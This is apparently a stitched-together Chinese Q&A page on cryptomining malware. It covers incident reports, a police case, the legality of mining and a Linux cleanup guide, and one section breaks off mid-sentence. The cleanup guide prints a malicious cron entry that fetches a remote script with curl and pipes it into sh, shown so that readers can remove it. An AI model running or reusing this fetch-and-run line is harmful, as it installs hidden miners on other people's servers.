百度程序員控制伺服器挖礦
Ⅰ 求助伺服器被挖礦程序入侵,如何排查
新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接
伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般
會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這
就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客
戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。
挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,
仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查
當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。
對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病
毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,
客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊
狀況。
通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開
發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重
的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,
SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器
一切穩定運行,網站打開正常。
Ⅱ 電腦挖礦違法嗎
正常用著的電腦,卻被非法控制,替別人「幹活」,用戶卻渾然不知。原來,電腦被植入了挖礦程序及挖礦監控程序,監控程序只要監測到電腦CPU利用率低於50%,挖礦程序就會在後台靜默啟動,通過大量耗費被控電腦的CPU、GPU資源和電力資源,持續不斷地挖取虛擬貨幣,並將這些虛擬貨幣轉至控制者處,從而提現牟取暴利。
近期,濰坊市公安局網安支隊會同青州市公安局在公安部、省公安廳指導下,在騰訊守護者計劃安全團隊協助下,按照公安部和省公安廳「凈網2018專項行動」部署要求,成功破獲部督「1.03」特大非法控制計算機信息系統案,目前抓獲犯罪嫌疑人20名,取保候審11名,批捕9名。
經查,大連昇平網路科技有限公司研發挖礦監控軟體、集成挖礦程序後,通過發展下線代理,非法控制了全國389餘萬台電腦主機做廣告增值收益,在100多萬台電腦主機靜默安裝挖礦程序。兩年期間共挖取DGB幣(「極特幣」)、DCR幣(「德賽幣」)、SC(「雲產幣」)幣2600餘萬枚,共非法獲利1500餘萬元。
據了解,雖然非法控制計算機信息系統的違法犯罪屢見不鮮,但是數量達到如此之巨,而且通過植入靜默挖礦程序這種新型手段,進行虛擬貨幣變現,這在全國是比較少見的。
游戲外掛暗藏挖礦木馬程序
2018年1月3日,濰坊市公安局網安支隊接騰訊守護者計劃安全團隊報案稱,騰訊電腦管家檢測到一款游戲外掛暗藏了一款木馬程序,該木馬程序具備後台靜默挖礦功能。
「挖礦,就是通過大量計算機運算獲取數字貨幣-虛擬貨幣獎勵,這個過程對電腦硬體配置要求比較高,主機經常長期高負荷運轉,顯卡、主板、內存等硬體會提前報廢,對電腦的損害極大。」辦案民警介紹。
辦案民警說,違法犯罪人員通常提前調研市面上挖取難度較低的虛擬貨幣,通過雲計算、顯卡雲計算業務非法控制用戶的電腦主機,植入這種虛擬貨幣的挖礦程序進行挖礦,用戶對此毫無察覺,只要電腦處於開機狀態,挖礦程序就在後台靜默運轉,在挖取到大量礦幣後迅速轉至控制者那裡變現提現,牟取高額利潤。
初步統計,該木馬程序感染數十萬台用戶機器。濰坊市公安局網安支隊接案後,迅速研判案件線索,通過互聯網提取到外掛木馬樣本,找到木馬開發者建立的木馬交流群,初步落查發現該款木馬程序開發者在青州市。市局網安支隊將該案情通報青州市公安局,由市局網安支隊、青州市局成立專案組,對該案立案偵查。
專案組確定交流群群主身份為楊某寶。通過偵查發現,楊某寶一是建立了多個外掛討論群,在群文件中共享外掛程序;二是利用「天下網吧論壇」版主的身份,將上傳含有木馬的外掛程序到「天下網吧」論壇供網民下載;三是通過網路網盤進行分享下載。
3月8日,專案組制定了詳細的抓捕方案,在家中將楊某寶抓獲。
Ⅲ 如何用電腦挖礦
要了解家用電腦挖礦這個問題,首先得解釋清楚挖礦。在比特幣出來以後,由於大家共同保存一個一模一樣的記錄交易的賬本,因此需要一個一錘定音有決定權的人來負責記錄這個賬本。誰來記錄呢?通過一道題目來決定,誰的計算機先算對了,那麼它就擁有記賬權,記錄這個區塊的所有數據,這就是挖礦的通俗解釋。而獎勵這個記賬的人,獲得了額外的一筆錢,這個就是挖礦的獎勵,獎勵給貢獻了足夠計算力來解題的人,也是我們為什麼要去挖礦的原因,幣就是錢,為了賺錢。比特幣挖礦最開始只是CPU的事,接下來,為了更多的錢,技術員們研發出來顯卡的、fpga的、ASIC晶元的,越來越快的記賬方法。這里請注意,只是比特幣的記賬方法,比特幣是sha256演算法,只是適用於這種的,也只能在這種演算法下進行挖礦。後來陸續出現了更多的演算法Ethash、KawPow、CryptoNight、Zhash、X16R、Randomx……,列不完的哈。注意這里幾個概念,演算法(上面的一堆),設備(CPU、顯卡、fpga、ASIC)他們是相輔相成的,一個幣種可能有多個演算法或單一演算法來記賬,同一設備也可以運行不同演算法獲得不同的獎勵,區別只是記賬效率的高低,賺錢的快慢。所以比特幣可以用CPU、顯卡、fpga、ASIC任何一種去挖,只是ASIC效率和性價比最高。下面回歸主題,家用電腦能挖什麼?家用電腦=CPU+顯卡CPU比較合適的就是Randomx演算法下的monero,顯卡的話,則適合nicehash的自動選擇。下面我應該說一下具體的挖礦教程來圓滿這份答案,但是個人推薦用一個更簡單更便捷的方法,甚至不需要了解上面所有的一切。
Ⅳ 如何用cpu挖礦
門羅幣反礦機適合CPU挖礦
門羅幣最新官方windows錢包下載地址:
1.下載好挖礦軟體,解壓。滑鼠右鍵點擊:「啟動.cmd」,彈出菜單中選擇「編輯」。
粘貼修改為之前你得到的錢包接收地址,這樣挖礦得到的礦是進您的錢包。
2.雙擊啟動.cmd,開始挖礦。
第1次運行可能會出現reboot等字樣,您就按它的英文操作,右擊「啟動.cmd」,選擇以管理員運行,然後重新電腦,使aes-ni生效後,再次正常高效運行挖礦賺錢。
Ⅳ 蔚來員工利用公司伺服器挖礦,這一行為是否違法
蔚來員工利用職務之便,從2021年2月開始使用公司伺服器進行挖礦,從中獲取利益,這個行為明顯已經觸犯了我國的相關法律。
其實利用公司資源進行非法挖礦行為早有先例,在2018年1月到5月期間,網路一個運維員工就曾經在網路公司伺服器上安裝挖礦程序,通過公司的資源謀取暴利,之後將挖礦所得的虛擬貨幣賣出,從中獲得10萬元人民幣,後來,在網路公司的追查下,這名員工才被發現,並且因涉嫌非法控制計算機信息系統罪被判有期徒刑三年,並處罰金1.1萬元,扣押違法所得10萬元整。
而對於挖礦這個行為,國家是堅決打擊的,目前相關的省份也出台了相關的文件,表面上只是提高了挖礦公司的電費,實際上是為了讓從事挖礦的人員知難而退,因為電費一旦上漲,那麼相對應的挖礦成本也就增加了。
綜上所述,該蔚來員工利用職務之便進行挖礦行為,已經涉嫌非法控制計算機信息系統罪,所以,他極有可能會因為此罪名而被起訴。
Ⅵ 什麼是挖礦
挖礦就是記賬的過程,礦工是記賬員,區塊鏈就是賬本。怎樣激勵礦工來挖礦呢?比特幣系統的記賬權力是去中心化的,即每個礦工都有記賬的權利。 成功搶到記賬權的礦工,會獲得系統新生的比特幣獎勵。因此,挖礦就是生產比特幣的過程。中本聰最初設計比特幣時規定每產生
Ⅶ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
Ⅷ 電腦挖礦合法嗎
法律分析:違法。所謂網路「挖礦」,是指計算機被植入的軟體程序,會通過特定演算法,在計算機上進行運算。運算完成後,自動得到特定結果,從而產生虛擬幣,這些虛擬幣可在第三方平台換算,獲得真實貨幣。
法律依據:《中華人民共和國刑法》 第二百八十五條 違反國家規定,侵入國家事務、國防建設、尖端科學技術領域的計算機信息系統的,處三年以下有期徒刑或者拘役。
違反國家規定,侵入前款規定以外的計算機信息系統或者採用其他技術手段,獲取該計算機信息系統中存儲、處理或者傳輸的數據,或者對該計算機信息系統實施非法控制,情節嚴重的,處三年以下有期徒刑或者拘役,並處或者單處罰金;情節特別嚴重的,處三年以上七年以下有期徒刑,並處罰金。
提供專門用於侵入、非法控制計算機信息系統的程序、工具,或者明知他人實施侵入、非法控制計算機信息系統的違法犯罪行為而為其提供程序、工具,情節嚴重的,依照前款的規定處罰。
單位犯前三款罪的,對單位判處罰金,並對其直接負責的主管人員和其他直接責任人員,依照各該款的規定處罰。
Ⅸ 新電腦病毒來襲:中招電腦會偷偷的挖礦給黑客賺錢
據華爾街日報消息,一種名為Adylkuzz的病毒正在蔓延,和近日在全球爆發的WannaCry勒索病毒不同的是,該病毒不會鎖定用戶的屏幕,也不會對用戶的電腦進行加密,但它能夠在用戶毫不知情的情況下悄然占據電腦處理器資源,偷偷生產一種類似於比特幣的數字貨幣。
據美國知名網路安全公司Proofpoint披露,該病毒早就在兩星期以前就開始傳播了,截至本周三已在全球感染了超過15萬台的計算機,在一次攻擊案例中,該病毒已經為黑客賺取了2.2萬美元的非法獲利。
實在做不到以上幾點的話,用戶可以先斷網再開機,就是先拔掉網線然後開機,這樣一來基本能夠避免被勒索病毒感染,同時注意備份重要數據,不要打開不明鏈接、文件和郵件,盡量想辦法給自己的電腦打上安全補丁。
原創聲明:本文(不含圖片)由文棟說自媒體網站原創,享有獨立版權,如需轉載敬請帶上本段版權,本站對一切轉載不保留版權的行為追究法律責任!